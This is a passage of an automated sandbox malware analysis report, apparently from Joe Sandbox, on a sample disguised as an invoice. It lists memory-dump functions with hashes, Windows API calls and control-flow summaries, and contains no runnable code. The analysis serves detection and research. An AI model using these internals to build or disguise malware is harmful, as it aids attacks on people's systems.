                                            Function 010C2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 9fb177f767657bdced3a9b87e2796e4cee044ce7c6cdfefb7503653e81529081
                                            • Instruction ID: ecfa70658b9b39eb20faddcd07cbe90cf9d34dc28c44ff2749ae8877a6ea2815
                                            • Opcode Fuzzy Hash: 9fb177f767657bdced3a9b87e2796e4cee044ce7c6cdfefb7503653e81529081
                                            • Instruction Fuzzy Hash: 2290022D21351002E180715C940860A001597D1202F95D416E0415558CC91589695322
                                            Function 010C2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 5d01a0bcd637a2dc50e8ee639109d36f5572077b515249a0639e3bd094ed314b
                                            • Instruction ID: 8628e9bab6a4280b3c2e93b823e84efe5b47ea11ff470ed144b555e552725cd5
                                            • Opcode Fuzzy Hash: 5d01a0bcd637a2dc50e8ee639109d36f5572077b515249a0639e3bd094ed314b
                                            • Instruction Fuzzy Hash: BE90022530151003E140715C94186064015E7E1301F55D012E0814554CD91589565323
                                            Function 010C2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 54e34584302c7f00bc29ac04c9bc70da1e61728808f5dff11917d5ea9b9c85b0
                                            • Instruction ID: d6ad78df4657e78a02ddfea4630f1a76ade5df248613fbe1764efe8a5ca789ff
                                            • Opcode Fuzzy Hash: 54e34584302c7f00bc29ac04c9bc70da1e61728808f5dff11917d5ea9b9c85b0
                                            • Instruction Fuzzy Hash: 31900225242551526545B15C84045074016A7E0241795C013E1814950CC5269956D722
                                            Function 010C2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 8e288622a6aea29f3d608eaf8b4d3dcd39e93b8458da5c2b529bc854cb0998c1
                                            • Instruction ID: acf2c8d1e2d96960b681eea5ca5cacdb14cebf6deb33b413c6205ea3aba0a92b
                                            • Opcode Fuzzy Hash: 8e288622a6aea29f3d608eaf8b4d3dcd39e93b8458da5c2b529bc854cb0998c1
                                            • Instruction Fuzzy Hash: CD90023520151413E111715C8504707001997D0241F95C413E0824558DD6568A52A222
                                            Function 010C2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 600358b4cd4593ba77800afe7d80ea72b7a045e83e3237ebfaa426247414913b
                                            • Instruction ID: 740b2f1bc921d13924461fa47c7379b5b344ed7290895cd18083d1d339512281
                                            • Opcode Fuzzy Hash: 600358b4cd4593ba77800afe7d80ea72b7a045e83e3237ebfaa426247414913b
                                            • Instruction Fuzzy Hash: FB90023520159802E110715CC40474A001597D0301F59C412E4824658DC69589917222
                                            Function 010C2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 7c7f71e62c3f8b425a33744cc8e4360529be7bbd83a7d6d984f7c3e72a54a4ee
                                            • Instruction ID: fed4dc03e18a5f70cfd9e0343e8a1d65693b43233959d44e72e06ef4d0de5170
                                            • Opcode Fuzzy Hash: 7c7f71e62c3f8b425a33744cc8e4360529be7bbd83a7d6d984f7c3e72a54a4ee
                                            • Instruction Fuzzy Hash: 3690023520151402E100759C9408646001597E0301F55D012E5424555EC66589916232
                                            Function 010C2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 878c63d71714c6976006fa7300a84b616f2b115beaad59904ec687e6172f6120
                                            • Instruction ID: 10dc08da85576375132361fd9ff1884ef651609ae1adb715fbb76964588ed284
                                            • Opcode Fuzzy Hash: 878c63d71714c6976006fa7300a84b616f2b115beaad59904ec687e6172f6120
                                            • Instruction Fuzzy Hash: C790026534151442E100715C8414B060015D7E1301F55C016E1464554DC619CD526227
                                            Function 010C2F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 872364fdf7f221f561f1ca42c108a7bc8b613c5e92ceda6f915aee74fe43ec84
                                            • Instruction ID: fa4645ee22d2b2d1daa6b35222647d3a2351f61f11ef2b2a6cf40949d43d66df
                                            • Opcode Fuzzy Hash: 872364fdf7f221f561f1ca42c108a7bc8b613c5e92ceda6f915aee74fe43ec84
                                            • Instruction Fuzzy Hash: 2A90023520191402E100715C881470B001597D0302F55C012E1564555DC62589516672
                                            Function 010C2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 1b97a59ccf8e7fea65267712fbd286b6411270be9fff84a2cf951bc2b41b8717
                                            • Instruction ID: bd63e9d360c8fc32940e01b5e3bfe276d81c83880dc6b2e3e915f593f13d48ff
                                            • Opcode Fuzzy Hash: 1b97a59ccf8e7fea65267712fbd286b6411270be9fff84a2cf951bc2b41b8717
                                            • Instruction Fuzzy Hash: 9F900225601510425140716CC8449064015BBE1211755C122E0D98550DC55989655766
                                            Function 010C2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: ea4bf5946d20526b400ab279e167b4e92acb0af8bf3038e54aa7ad10297ce80e
                                            • Instruction ID: f9e4b64ccdf6de43697c09f54e28a01be5dd1c21a44b465b23d6e37b0fffc015
                                            • Opcode Fuzzy Hash: ea4bf5946d20526b400ab279e167b4e92acb0af8bf3038e54aa7ad10297ce80e
                                            • Instruction Fuzzy Hash: 58900225211D1042E200756C8C14B07001597D0303F55C116E0554554CC91589615622
                                            Function 010C2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: a5323294c590dda0d6297558ed6c040f83b7ab1addf1b5473bcf305c7304a568
                                            • Instruction ID: f12143e3dfc50a638a691c591602be029386b53a50cea896c01e4641a6047eb6
                                            • Opcode Fuzzy Hash: a5323294c590dda0d6297558ed6c040f83b7ab1addf1b5473bcf305c7304a568
                                            • Instruction Fuzzy Hash: EC90022560151502E101715C8404616001A97D0241F95C023E1424555ECA258A92A232
                                            Function 010C2EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: e9dd6f348aa56a76c0e3ac9d2bae00fb816baaa16c12caece1cda2714647f610
                                            • Instruction ID: 3222d2b25440912e98916495796444b4e6e13cfb5da51f9e8f70c26cbc571d53
                                            • Opcode Fuzzy Hash: e9dd6f348aa56a76c0e3ac9d2bae00fb816baaa16c12caece1cda2714647f610
                                            • Instruction Fuzzy Hash: 5D90027520151402E140715C8404746001597D0301F55C012E5464554EC6598ED56766
                                            Function 00409AB0 Relevance: .1, Instructions: 92COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                            • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                                            • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                            • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                                            Function 0041A6A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28memoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateExitHeapProcess
                                            • String ID: 6EA
                                            • API String ID: 1054155344-1400015478
                                            • Opcode ID: 66b8104336315a9f52015917b6604f833b9b7d5692cc8aa938a562dd4646df17
                                            • Instruction ID: 81c6c1a5e2af359145904ba9a0b197968cf10ed5afa4bb6f52b1660ac30928b9
                                            • Opcode Fuzzy Hash: 66b8104336315a9f52015917b6604f833b9b7d5692cc8aa938a562dd4646df17
                                            • Instruction Fuzzy Hash: 00E02B742041606BC720EFA4CC80ED77B78DF84310F28859AF8880B202C139A99987A0
                                            Function 0041A630 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 13 41a630-41a661 call 41af60 RtlAllocateHeap
                                            APIs
                                            • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID: 6EA
                                            • API String ID: 1279760036-1400015478
                                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                            • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                            • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                                            Function 0041A5F6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19memoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 17 41a5f6-41a5f8 18 41a645-41a647 call 41af60 17->18 19 41a5fa 17->19 21 41a64c-41a661 RtlAllocateHeap 18->21 19->18
                                            APIs
                                            • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID: 6EA
                                            • API String ID: 1279760036-1400015478
                                            • Opcode ID: 2f251d9f86b93f23e9f313480a398d9767f4aff9f4654071ec90cbd95905dd1d
                                            • Instruction ID: 21c2729fc4628242416dca04c31ccf5325c74c38dfec4eb66b1c45ad418b378e
                                            • Opcode Fuzzy Hash: 2f251d9f86b93f23e9f313480a398d9767f4aff9f4654071ec90cbd95905dd1d
                                            • Instruction Fuzzy Hash: B9D05EB0901108AFDB10EF55D841C9B7379EF88228B20845EF81843305C635D8A1CBF2
                                            Function 00408309 Relevance: 1.6, APIs: 1, Instructions: 57threadwindowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 221 408309-40835a call 41be60 call 41ca00 call 40acf0 call 414e50 231 40835c-40836e PostThreadMessageW 221->231 232 40838e-408392 221->232 233 408370-40838a call 40a480 231->233 234 40838d 231->234 233->234 234->232
                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: 01f4562bb8fa326505ded0cc96fd3c5e0364146ed88be967dfbd09c17f78a38c
                                            • Instruction ID: b5b672432d4521e2bf74b51762e52bf96c15530acd3863b109e0216e37686040
                                            • Opcode Fuzzy Hash: 01f4562bb8fa326505ded0cc96fd3c5e0364146ed88be967dfbd09c17f78a38c
                                            • Instruction Fuzzy Hash: 6B01D831A8032C7AE721A6959C43FFE771C9F40F64F05021AFF04BA1C2D6E9690646F9
                                            Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 237 408310-40831f 238 408328-40835a call 41ca00 call 40acf0 call 414e50 237->238 239 408323 call 41be60 237->239 246 40835c-40836e PostThreadMessageW 238->246 247 40838e-408392 238->247 239->238 248 408370-40838a call 40a480 246->248 249 40838d 246->249 248->249 249->247
                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                            • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                                            • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                            • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                            Function 0041A663 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: fec54796e29084349b73cfac03e3a7edff0034a6eef13771392a377227e3a236
                                            • Instruction ID: fdfc6844065ba0c60b0fb25239c427dc19e25aa7a21e99e3004bebaf34ae13cb
                                            • Opcode Fuzzy Hash: fec54796e29084349b73cfac03e3a7edff0034a6eef13771392a377227e3a236
                                            • Instruction Fuzzy Hash: C2E0EDB5200305AFD718DF54CC44EEB33A8EF88390F20801AFD4C87282C230E911CAE0
                                            Function 0041A7CE Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                            Download Yara Rule
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: d1d6be081c6f6d07fd2b07f3e7b2fd30b21c4bc545da98e57cb82f8f77e74cf1
                                            • Instruction ID: 963ea6d49b7f8294577af8443ec2e3893ac60c9ba4578b521522a0fc130bd970
                                            • Opcode Fuzzy Hash: d1d6be081c6f6d07fd2b07f3e7b2fd30b21c4bc545da98e57cb82f8f77e74cf1
                                            • Instruction Fuzzy Hash: 30E01AB1600208AFDB24DF55CC85EEB37A9EF89354F15816AFD0DA7242C635A8118BB5
                                            Function 0041A670 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                            • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                            • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                                            Function 0041A7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                            Download Yara Rule
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                            • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                            • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                                            Function 0041A6B0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                            Download Yara Rule
                                            APIs
                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:
                                            • API String ID: 621844428-0
                                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                            • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                            • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                                            Function 010C2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 80ae76f0435d3946796b2fa286f217d9b0c9ca3112f64b5d358d6c665a3ad3f8
                                            • Instruction ID: ae3ab1fd66be5613d839faeca7cf93f8b18163841a34fc5aa7a8d6639754f940
                                            • Opcode Fuzzy Hash: 80ae76f0435d3946796b2fa286f217d9b0c9ca3112f64b5d358d6c665a3ad3f8
                                            • Instruction Fuzzy Hash: 39B09B719015D5C5EA51E764860871F795077D0701F15C066D2430681F4738C1D1E676

                                            Non-executed Functions

                                            Function 01102349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-2160512332
                                            • Opcode ID: 17df6db8d0fe3216280e819ce5e96fc152c37532b864cb1495cae378475d0124
                                            • Instruction ID: c77e0dfccfafb32eb9b63c236c0e26d5960a31b87dd57a11026ca82eafeca47e
                                            • Opcode Fuzzy Hash: 17df6db8d0fe3216280e819ce5e96fc152c37532b864cb1495cae378475d0124
                                            • Instruction Fuzzy Hash: A5929371A047429FE72ADF14C884FABB7E8BB84754F04492DFA95D7290D7B0D844CB92
                                            Function 010B8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                            Download Yara Rule
                                            Strings
                                            • 8, xrefs: 010F52E3
                                            • Critical section debug info address, xrefs: 010F541F, 010F552E
                                            • Invalid debug info address of this critical section, xrefs: 010F54B6
                                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010F54CE
                                            • Critical section address., xrefs: 010F5502
                                            • double initialized or corrupted critical section, xrefs: 010F5508
                                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010F54E2
                                            • undeleted critical section in freed memory, xrefs: 010F542B
                                            • Critical section address, xrefs: 010F5425, 010F54BC, 010F5534
                                            • Thread identifier, xrefs: 010F553A
                                            • corrupted critical section, xrefs: 010F54C2
                                            • Address of the debug info found in the active list., xrefs: 010F54AE, 010F54FA
                                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010F540A, 010F5496, 010F5519
                                            • Thread is in a state in which it cannot own a critical section, xrefs: 010F5543
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                            • API String ID: 0-2368682639
